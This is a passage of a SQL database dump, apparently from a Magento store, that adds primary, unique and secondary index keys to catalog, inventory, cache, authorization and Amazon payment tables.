  ADD KEY `ADOBE_STOCK_ASSET_CREATOR_ID` (`creator_id`);

--
-- Indexes for table `adobe_stock_category`
--
ALTER TABLE `adobe_stock_category`
  ADD PRIMARY KEY (`id`),
  ADD KEY `ADOBE_STOCK_CATEGORY_ID` (`id`);

--
-- Indexes for table `adobe_stock_creator`
--
ALTER TABLE `adobe_stock_creator`
  ADD PRIMARY KEY (`id`),
  ADD KEY `ADOBE_STOCK_CREATOR_ID` (`id`);

--
-- Indexes for table `adobe_user_profile`
--
ALTER TABLE `adobe_user_profile`
  ADD PRIMARY KEY (`id`),
  ADD KEY `ADOBE_USER_PROFILE_ADMIN_USER_ID_ADMIN_USER_USER_ID` (`admin_user_id`),
  ADD KEY `ADOBE_USER_PROFILE_ID` (`id`);

--
-- Indexes for table `amazon_customer`
--
ALTER TABLE `amazon_customer`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `AMAZON_CUSTOMER_CUSTOMER_ID_AMAZON_ID` (`customer_id`,`amazon_id`),
  ADD UNIQUE KEY `AMAZON_CUSTOMER_CUSTOMER_ID` (`customer_id`);

--
-- Indexes for table `amazon_pending_authorization`
--
ALTER TABLE `amazon_pending_authorization`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `UNQ_E6CCA08713FB32BB136A56837009C371` (`order_id`,`payment_id`,`authorization_id`);

--
-- Indexes for table `amazon_pending_capture`
--
ALTER TABLE `amazon_pending_capture`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `AMAZON_PENDING_CAPTURE_ORDER_ID_PAYMENT_ID_CAPTURE_ID` (`order_id`,`payment_id`,`capture_id`);

--
-- Indexes for table `amazon_pending_refund`
--
ALTER TABLE `amazon_pending_refund`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `AMAZON_PENDING_REFUND_ORDER_ID_PAYMENT_ID_REFUND_ID` (`order_id`,`payment_id`,`refund_id`);

--
-- Indexes for table `amazon_quote`
--
ALTER TABLE `amazon_quote`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `AMAZON_QUOTE_QUOTE_ID` (`quote_id`);

--
-- Indexes for table `amazon_sales_order`
--
ALTER TABLE `amazon_sales_order`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `AMAZON_SALES_ORDER_ORDER_ID` (`order_id`);

--
-- Indexes for table `authorization_role`
--
ALTER TABLE `authorization_role`
  ADD PRIMARY KEY (`role_id`),
  ADD KEY `AUTHORIZATION_ROLE_PARENT_ID_SORT_ORDER` (`parent_id`,`sort_order`),
  ADD KEY `AUTHORIZATION_ROLE_TREE_LEVEL` (`tree_level`);

--
-- Indexes for table `authorization_rule`
--
ALTER TABLE `authorization_rule`
  ADD PRIMARY KEY (`rule_id`),
  ADD KEY `AUTHORIZATION_RULE_RESOURCE_ID_ROLE_ID` (`resource_id`,`role_id`),
  ADD KEY `AUTHORIZATION_RULE_ROLE_ID_RESOURCE_ID` (`role_id`,`resource_id`);

--
-- Indexes for table `cache`
--
ALTER TABLE `cache`
  ADD PRIMARY KEY (`id`),
  ADD KEY `CACHE_EXPIRE_TIME` (`expire_time`);

--
-- Indexes for table `cache_tag`
--
ALTER TABLE `cache_tag`
  ADD PRIMARY KEY (`tag`,`cache_id`),
  ADD KEY `CACHE_TAG_CACHE_ID` (`cache_id`);

--
-- Indexes for table `captcha_log`
--
ALTER TABLE `captcha_log`
  ADD PRIMARY KEY (`type`,`value`);

--
-- Indexes for table `cataloginventory_stock`
--
ALTER TABLE `cataloginventory_stock`
  ADD PRIMARY KEY (`stock_id`),
  ADD KEY `CATALOGINVENTORY_STOCK_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `cataloginventory_stock_item`
--
ALTER TABLE `cataloginventory_stock_item`
  ADD PRIMARY KEY (`item_id`),
  ADD UNIQUE KEY `CATALOGINVENTORY_STOCK_ITEM_PRODUCT_ID_STOCK_ID` (`product_id`,`stock_id`),
  ADD KEY `CATALOGINVENTORY_STOCK_ITEM_WEBSITE_ID` (`website_id`),
  ADD KEY `CATALOGINVENTORY_STOCK_ITEM_STOCK_ID` (`stock_id`);

--
-- Indexes for table `cataloginventory_stock_status`
--
ALTER TABLE `cataloginventory_stock_status`
  ADD PRIMARY KEY (`product_id`,`website_id`,`stock_id`),
  ADD KEY `CATALOGINVENTORY_STOCK_STATUS_STOCK_ID` (`stock_id`),
  ADD KEY `CATALOGINVENTORY_STOCK_STATUS_WEBSITE_ID` (`website_id`),
  ADD KEY `CATALOGINVENTORY_STOCK_STATUS_STOCK_STATUS` (`stock_status`);

--
-- Indexes for table `cataloginventory_stock_status_idx`
--
ALTER TABLE `cataloginventory_stock_status_idx`
  ADD PRIMARY KEY (`product_id`,`website_id`,`stock_id`),
  ADD KEY `CATALOGINVENTORY_STOCK_STATUS_IDX_STOCK_ID` (`stock_id`),
  ADD KEY `CATALOGINVENTORY_STOCK_STATUS_IDX_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `cataloginventory_stock_status_replica`
--
ALTER TABLE `cataloginventory_stock_status_replica`
  ADD PRIMARY KEY (`product_id`,`website_id`,`stock_id`),
  ADD KEY `CATALOGINVENTORY_STOCK_STATUS_STOCK_ID` (`stock_id`),
  ADD KEY `CATALOGINVENTORY_STOCK_STATUS_WEBSITE_ID` (`website_id`),
  ADD KEY `CATALOGINVENTORY_STOCK_STATUS_STOCK_STATUS` (`stock_status`);

--
-- Indexes for table `cataloginventory_stock_status_tmp`
--
ALTER TABLE `cataloginventory_stock_status_tmp`
  ADD PRIMARY KEY (`product_id`,`website_id`,`stock_id`),
  ADD KEY `CATALOGINVENTORY_STOCK_STATUS_TMP_STOCK_ID` (`stock_id`),
  ADD KEY `CATALOGINVENTORY_STOCK_STATUS_TMP_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `catalogrule`
--
ALTER TABLE `catalogrule`
  ADD PRIMARY KEY (`rule_id`),
  ADD KEY `CATALOGRULE_IS_ACTIVE_SORT_ORDER_TO_DATE_FROM_DATE` (`is_active`,`sort_order`,`to_date`,`from_date`);

--
-- Indexes for table `catalogrule_customer_group`
--
ALTER TABLE `catalogrule_customer_group`
  ADD PRIMARY KEY (`rule_id`,`customer_group_id`),
  ADD KEY `CATALOGRULE_CUSTOMER_GROUP_CUSTOMER_GROUP_ID` (`customer_group_id`);

--
-- Indexes for table `catalogrule_group_website`
--
ALTER TABLE `catalogrule_group_website`
  ADD PRIMARY KEY (`rule_id`,`customer_group_id`,`website_id`),
  ADD KEY `CATALOGRULE_GROUP_WEBSITE_CUSTOMER_GROUP_ID` (`customer_group_id`),
  ADD KEY `CATALOGRULE_GROUP_WEBSITE_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `catalogrule_group_website_replica`
--
ALTER TABLE `catalogrule_group_website_replica`
  ADD PRIMARY KEY (`rule_id`,`customer_group_id`,`website_id`),
  ADD KEY `CATALOGRULE_GROUP_WEBSITE_CUSTOMER_GROUP_ID` (`customer_group_id`),
  ADD KEY `CATALOGRULE_GROUP_WEBSITE_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `catalogrule_product`
--
ALTER TABLE `catalogrule_product`
  ADD PRIMARY KEY (`rule_product_id`),
  ADD UNIQUE KEY `UNQ_EAA51B56FF092A0DCB795D1CEF812B7B` (`rule_id`,`from_time`,`to_time`,`website_id`,`customer_group_id`,`product_id`,`sort_order`),
  ADD KEY `CATALOGRULE_PRODUCT_CUSTOMER_GROUP_ID` (`customer_group_id`),
  ADD KEY `CATALOGRULE_PRODUCT_WEBSITE_ID` (`website_id`),
  ADD KEY `CATALOGRULE_PRODUCT_FROM_TIME` (`from_time`),
  ADD KEY `CATALOGRULE_PRODUCT_TO_TIME` (`to_time`),
  ADD KEY `CATALOGRULE_PRODUCT_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `catalogrule_product_price`
--
ALTER TABLE `catalogrule_product_price`
  ADD PRIMARY KEY (`rule_product_price_id`),
  ADD UNIQUE KEY `CATRULE_PRD_PRICE_RULE_DATE_WS_ID_CSTR_GROUP_ID_PRD_ID` (`rule_date`,`website_id`,`customer_group_id`,`product_id`),
  ADD KEY `CATALOGRULE_PRODUCT_PRICE_CUSTOMER_GROUP_ID` (`customer_group_id`),
  ADD KEY `CATALOGRULE_PRODUCT_PRICE_WEBSITE_ID` (`website_id`),
  ADD KEY `CATALOGRULE_PRODUCT_PRICE_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `catalogrule_product_price_replica`
--
ALTER TABLE `catalogrule_product_price_replica`
  ADD PRIMARY KEY (`rule_product_price_id`),
  ADD UNIQUE KEY `CATRULE_PRD_PRICE_RULE_DATE_WS_ID_CSTR_GROUP_ID_PRD_ID` (`rule_date`,`website_id`,`customer_group_id`,`product_id`),
  ADD KEY `CATALOGRULE_PRODUCT_PRICE_CUSTOMER_GROUP_ID` (`customer_group_id`),
  ADD KEY `CATALOGRULE_PRODUCT_PRICE_WEBSITE_ID` (`website_id`),
  ADD KEY `CATALOGRULE_PRODUCT_PRICE_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `catalogrule_product_replica`
--
ALTER TABLE `catalogrule_product_replica`
  ADD PRIMARY KEY (`rule_product_id`),
  ADD UNIQUE KEY `UNQ_EAA51B56FF092A0DCB795D1CEF812B7B` (`rule_id`,`from_time`,`to_time`,`website_id`,`customer_group_id`,`product_id`,`sort_order`),
  ADD KEY `CATALOGRULE_PRODUCT_CUSTOMER_GROUP_ID` (`customer_group_id`),
  ADD KEY `CATALOGRULE_PRODUCT_WEBSITE_ID` (`website_id`),
  ADD KEY `CATALOGRULE_PRODUCT_FROM_TIME` (`from_time`),
  ADD KEY `CATALOGRULE_PRODUCT_TO_TIME` (`to_time`),
  ADD KEY `CATALOGRULE_PRODUCT_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `catalogrule_website`
--
ALTER TABLE `catalogrule_website`
  ADD PRIMARY KEY (`rule_id`,`website_id`),
  ADD KEY `CATALOGRULE_WEBSITE_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `catalogsearch_fulltext_scope1`
--
ALTER TABLE `catalogsearch_fulltext_scope1`
  ADD PRIMARY KEY (`entity_id`,`attribute_id`);
ALTER TABLE `catalogsearch_fulltext_scope1` ADD FULLTEXT KEY `FTI_FULLTEXT_DATA_INDEX` (`data_index`);

--
-- Indexes for table `catalogsearch_recommendations`
--
ALTER TABLE `catalogsearch_recommendations`
  ADD PRIMARY KEY (`id`),
  ADD KEY `CATALOGSEARCH_RECOMMENDATIONS_QUERY_ID_SEARCH_QUERY_QUERY_ID` (`query_id`),
  ADD KEY `CATALOGSEARCH_RECOMMENDATIONS_RELATION_ID_SEARCH_QUERY_QUERY_ID` (`relation_id`);

--
-- Indexes for table `catalog_category_entity`
--
ALTER TABLE `catalog_category_entity`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_LEVEL` (`level`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_PATH` (`path`);

--
-- Indexes for table `catalog_category_entity_datetime`
--
ALTER TABLE `catalog_category_entity_datetime`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CATALOG_CATEGORY_ENTITY_DATETIME_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_DATETIME_ENTITY_ID` (`entity_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_DATETIME_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_DATETIME_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_category_entity_decimal`
--
ALTER TABLE `catalog_category_entity_decimal`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CATALOG_CATEGORY_ENTITY_DECIMAL_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_DECIMAL_ENTITY_ID` (`entity_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_DECIMAL_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_DECIMAL_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_category_entity_int`
--
ALTER TABLE `catalog_category_entity_int`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CATALOG_CATEGORY_ENTITY_INT_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_INT_ENTITY_ID` (`entity_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_INT_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_INT_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_category_entity_text`
--
ALTER TABLE `catalog_category_entity_text`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CATALOG_CATEGORY_ENTITY_TEXT_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_TEXT_ENTITY_ID` (`entity_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_TEXT_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_TEXT_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_category_entity_varchar`
--
ALTER TABLE `catalog_category_entity_varchar`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CATALOG_CATEGORY_ENTITY_VARCHAR_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_VARCHAR_ENTITY_ID` (`entity_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_VARCHAR_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_CATEGORY_ENTITY_VARCHAR_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_category_product`
--
ALTER TABLE `catalog_category_product`
  ADD PRIMARY KEY (`entity_id`,`category_id`,`product_id`),
  ADD UNIQUE KEY `CATALOG_CATEGORY_PRODUCT_CATEGORY_ID_PRODUCT_ID` (`category_id`,`product_id`),
  ADD KEY `CATALOG_CATEGORY_PRODUCT_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `catalog_category_product_index`
--
ALTER TABLE `catalog_category_product_index`
  ADD PRIMARY KEY (`category_id`,`product_id`,`store_id`),
  ADD KEY `CAT_CTGR_PRD_IDX_PRD_ID_STORE_ID_CTGR_ID_VISIBILITY` (`product_id`,`store_id`,`category_id`,`visibility`),
  ADD KEY `CAT_CTGR_PRD_IDX_STORE_ID_CTGR_ID_VISIBILITY_IS_PARENT_POSITION` (`store_id`,`category_id`,`visibility`,`is_parent`,`position`);

--
-- Indexes for table `catalog_category_product_index_replica`
--
ALTER TABLE `catalog_category_product_index_replica`
  ADD PRIMARY KEY (`category_id`,`product_id`,`store_id`),
  ADD KEY `CAT_CTGR_PRD_IDX_PRD_ID_STORE_ID_CTGR_ID_VISIBILITY` (`product_id`,`store_id`,`category_id`,`visibility`),
  ADD KEY `CAT_CTGR_PRD_IDX_STORE_ID_CTGR_ID_VISIBILITY_IS_PARENT_POSITION` (`store_id`,`category_id`,`visibility`,`is_parent`,`position`);

--
-- Indexes for table `catalog_category_product_index_store1`
--
ALTER TABLE `catalog_category_product_index_store1`
  ADD PRIMARY KEY (`category_id`,`product_id`,`store_id`),
  ADD KEY `CAT_CTGR_PRD_IDX_STORE1_PRD_ID_STORE_ID_CTGR_ID_VISIBILITY` (`product_id`,`store_id`,`category_id`,`visibility`),
  ADD KEY `IDX_216E521C8AD125E066D2B0BAB4A08412` (`store_id`,`category_id`,`visibility`,`is_parent`,`position`);

--
-- Indexes for table `catalog_category_product_index_store1_replica`
--
ALTER TABLE `catalog_category_product_index_store1_replica`
  ADD PRIMARY KEY (`category_id`,`product_id`,`store_id`),
  ADD KEY `IDX_4B965DC45C352D6E4C9DC0FF50B1FCF5` (`product_id`,`store_id`,`category_id`,`visibility`),
  ADD KEY `IDX_47AB760CD6A893ACEA69A9C2E0112C60` (`store_id`,`category_id`,`visibility`,`is_parent`,`position`);

--
-- Indexes for table `catalog_category_product_index_tmp`
--
ALTER TABLE `catalog_category_product_index_tmp`
  ADD PRIMARY KEY (`category_id`,`product_id`,`store_id`),
  ADD KEY `CAT_CTGR_PRD_IDX_TMP_PRD_ID_CTGR_ID_STORE_ID` (`product_id`,`category_id`,`store_id`);

--
-- Indexes for table `catalog_compare_item`
--
ALTER TABLE `catalog_compare_item`
  ADD PRIMARY KEY (`catalog_compare_item_id`),
  ADD KEY `CATALOG_COMPARE_ITEM_PRODUCT_ID` (`product_id`),
  ADD KEY `CATALOG_COMPARE_ITEM_VISITOR_ID_PRODUCT_ID` (`visitor_id`,`product_id`),
  ADD KEY `CATALOG_COMPARE_ITEM_CUSTOMER_ID_PRODUCT_ID` (`customer_id`,`product_id`),
  ADD KEY `CATALOG_COMPARE_ITEM_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_eav_attribute`
--
ALTER TABLE `catalog_eav_attribute`
  ADD PRIMARY KEY (`attribute_id`),
  ADD KEY `CATALOG_EAV_ATTRIBUTE_USED_FOR_SORT_BY` (`used_for_sort_by`),
  ADD KEY `CATALOG_EAV_ATTRIBUTE_USED_IN_PRODUCT_LISTING` (`used_in_product_listing`);

--
-- Indexes for table `catalog_product_bundle_option`
--
ALTER TABLE `catalog_product_bundle_option`
  ADD PRIMARY KEY (`option_id`),
  ADD KEY `CATALOG_PRODUCT_BUNDLE_OPTION_PARENT_ID` (`parent_id`);

--
-- Indexes for table `catalog_product_bundle_option_value`
--
ALTER TABLE `catalog_product_bundle_option_value`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CAT_PRD_BNDL_OPT_VAL_OPT_ID_PARENT_PRD_ID_STORE_ID` (`option_id`,`parent_product_id`,`store_id`);

--
-- Indexes for table `catalog_product_bundle_price_index`
--
ALTER TABLE `catalog_product_bundle_price_index`
  ADD PRIMARY KEY (`entity_id`,`website_id`,`customer_group_id`),
  ADD KEY `CATALOG_PRODUCT_BUNDLE_PRICE_INDEX_WEBSITE_ID` (`website_id`),
  ADD KEY `CATALOG_PRODUCT_BUNDLE_PRICE_INDEX_CUSTOMER_GROUP_ID` (`customer_group_id`);

--
-- Indexes for table `catalog_product_bundle_selection`
--
ALTER TABLE `catalog_product_bundle_selection`
  ADD PRIMARY KEY (`selection_id`),
  ADD KEY `CATALOG_PRODUCT_BUNDLE_SELECTION_OPTION_ID` (`option_id`),
  ADD KEY `CATALOG_PRODUCT_BUNDLE_SELECTION_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `catalog_product_bundle_selection_price`
--
ALTER TABLE `catalog_product_bundle_selection_price`
  ADD PRIMARY KEY (`selection_id`,`parent_product_id`,`website_id`),
  ADD KEY `CATALOG_PRODUCT_BUNDLE_SELECTION_PRICE_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `catalog_product_bundle_stock_index`
--
ALTER TABLE `catalog_product_bundle_stock_index`
  ADD PRIMARY KEY (`entity_id`,`website_id`,`stock_id`,`option_id`);

--
-- Indexes for table `catalog_product_entity`
--
ALTER TABLE `catalog_product_entity`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_ATTRIBUTE_SET_ID` (`attribute_set_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_SKU` (`sku`);

--
-- Indexes for table `catalog_product_entity_datetime`
--
ALTER TABLE `catalog_product_entity_datetime`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_ENTITY_DATETIME_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_DATETIME_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_DATETIME_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_product_entity_decimal`
--
ALTER TABLE `catalog_product_entity_decimal`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_ENTITY_DECIMAL_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_DECIMAL_STORE_ID` (`store_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_DECIMAL_ATTRIBUTE_ID` (`attribute_id`);

--
-- Indexes for table `catalog_product_entity_gallery`
--
ALTER TABLE `catalog_product_entity_gallery`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_ENTITY_GALLERY_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_GALLERY_ENTITY_ID` (`entity_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_GALLERY_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_GALLERY_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_product_entity_int`
--
ALTER TABLE `catalog_product_entity_int`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_ENTITY_INT_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_INT_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_INT_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_product_entity_media_gallery`
--
ALTER TABLE `catalog_product_entity_media_gallery`
  ADD PRIMARY KEY (`value_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_MEDIA_GALLERY_ATTRIBUTE_ID` (`attribute_id`);

--
-- Indexes for table `catalog_product_entity_media_gallery_value`
--
ALTER TABLE `catalog_product_entity_media_gallery_value`
  ADD PRIMARY KEY (`record_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_MEDIA_GALLERY_VALUE_STORE_ID` (`store_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_MEDIA_GALLERY_VALUE_ENTITY_ID` (`entity_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_MEDIA_GALLERY_VALUE_VALUE_ID` (`value_id`),
  ADD KEY `CAT_PRD_ENTT_MDA_GLR_VAL_ENTT_ID_VAL_ID_STORE_ID` (`entity_id`,`value_id`,`store_id`);

--
-- Indexes for table `catalog_product_entity_media_gallery_value_to_entity`
--
ALTER TABLE `catalog_product_entity_media_gallery_value_to_entity`
  ADD UNIQUE KEY `CAT_PRD_ENTT_MDA_GLR_VAL_TO_ENTT_VAL_ID_ENTT_ID` (`value_id`,`entity_id`),
  ADD KEY `CAT_PRD_ENTT_MDA_GLR_VAL_TO_ENTT_ENTT_ID_CAT_PRD_ENTT_ENTT_ID` (`entity_id`);

--
-- Indexes for table `catalog_product_entity_media_gallery_value_video`
--
ALTER TABLE `catalog_product_entity_media_gallery_value_video`
  ADD UNIQUE KEY `CAT_PRD_ENTT_MDA_GLR_VAL_VIDEO_VAL_ID_STORE_ID` (`value_id`,`store_id`),
  ADD KEY `CAT_PRD_ENTT_MDA_GLR_VAL_VIDEO_STORE_ID_STORE_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_product_entity_text`
--
ALTER TABLE `catalog_product_entity_text`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_ENTITY_TEXT_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_TEXT_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_TEXT_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_product_entity_tier_price`
--
ALTER TABLE `catalog_product_entity_tier_price`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `UNQ_E8AB433B9ACB00343ABB312AD2FAB087` (`entity_id`,`all_groups`,`customer_group_id`,`qty`,`website_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_TIER_PRICE_CUSTOMER_GROUP_ID` (`customer_group_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_TIER_PRICE_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `catalog_product_entity_varchar`
--
ALTER TABLE `catalog_product_entity_varchar`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_ENTITY_VARCHAR_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_VARCHAR_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_PRODUCT_ENTITY_VARCHAR_STORE_ID` (`store_id`);

--
-- Indexes for table `catalog_product_frontend_action`
--
ALTER TABLE `catalog_product_frontend_action`
  ADD PRIMARY KEY (`action_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_FRONTEND_ACTION_VISITOR_ID_PRODUCT_ID_TYPE_ID` (`visitor_id`,`product_id`,`type_id`),
  ADD UNIQUE KEY `CATALOG_PRODUCT_FRONTEND_ACTION_CUSTOMER_ID_PRODUCT_ID_TYPE_ID` (`customer_id`,`product_id`,`type_id`),
  ADD KEY `CAT_PRD_FRONTEND_ACTION_PRD_ID_CAT_PRD_ENTT_ENTT_ID` (`product_id`);

--
-- Indexes for table `catalog_product_index_eav`
--
ALTER TABLE `catalog_product_index_eav`
  ADD PRIMARY KEY (`entity_id`,`attribute_id`,`store_id`,`value`,`source_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_STORE_ID` (`store_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_VALUE` (`value`);

--
-- Indexes for table `catalog_product_index_eav_decimal`
--
ALTER TABLE `catalog_product_index_eav_decimal`
  ADD PRIMARY KEY (`entity_id`,`attribute_id`,`store_id`,`value`,`source_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_DECIMAL_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_DECIMAL_STORE_ID` (`store_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_DECIMAL_VALUE` (`value`);

--
-- Indexes for table `catalog_product_index_eav_decimal_idx`
--
ALTER TABLE `catalog_product_index_eav_decimal_idx`
  ADD PRIMARY KEY (`entity_id`,`attribute_id`,`store_id`,`value`,`source_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_DECIMAL_IDX_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_DECIMAL_IDX_STORE_ID` (`store_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_DECIMAL_IDX_VALUE` (`value`);

--
-- Indexes for table `catalog_product_index_eav_decimal_replica`
--
ALTER TABLE `catalog_product_index_eav_decimal_replica`
  ADD PRIMARY KEY (`entity_id`,`attribute_id`,`store_id`,`value`,`source_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_DECIMAL_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_DECIMAL_STORE_ID` (`store_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_DECIMAL_VALUE` (`value`);

--
-- Indexes for table `catalog_product_index_eav_decimal_tmp`
--
ALTER TABLE `catalog_product_index_eav_decimal_tmp`
  ADD PRIMARY KEY (`entity_id`,`attribute_id`,`store_id`,`value`,`source_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_DECIMAL_TMP_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_DECIMAL_TMP_STORE_ID` (`store_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_DECIMAL_TMP_VALUE` (`value`);

--
-- Indexes for table `catalog_product_index_eav_idx`
--
ALTER TABLE `catalog_product_index_eav_idx`
  ADD PRIMARY KEY (`entity_id`,`attribute_id`,`store_id`,`value`,`source_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_IDX_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_IDX_STORE_ID` (`store_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_IDX_VALUE` (`value`);

--
-- Indexes for table `catalog_product_index_eav_replica`
--
ALTER TABLE `catalog_product_index_eav_replica`
  ADD PRIMARY KEY (`entity_id`,`attribute_id`,`store_id`,`value`,`source_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_STORE_ID` (`store_id`),
  ADD KEY `CATALOG_PRODUCT_INDEX_EAV_VALUE` (`value`);

--
-- Indexes for table `catalog_product_index_eav_tmp`
--
ALTER TABLE `catalog_product_index_eav_tmp`
  ADD PRIMARY KEY (`entity_id`,`attribute_id`,`store_id`,`value`,`source_id`),
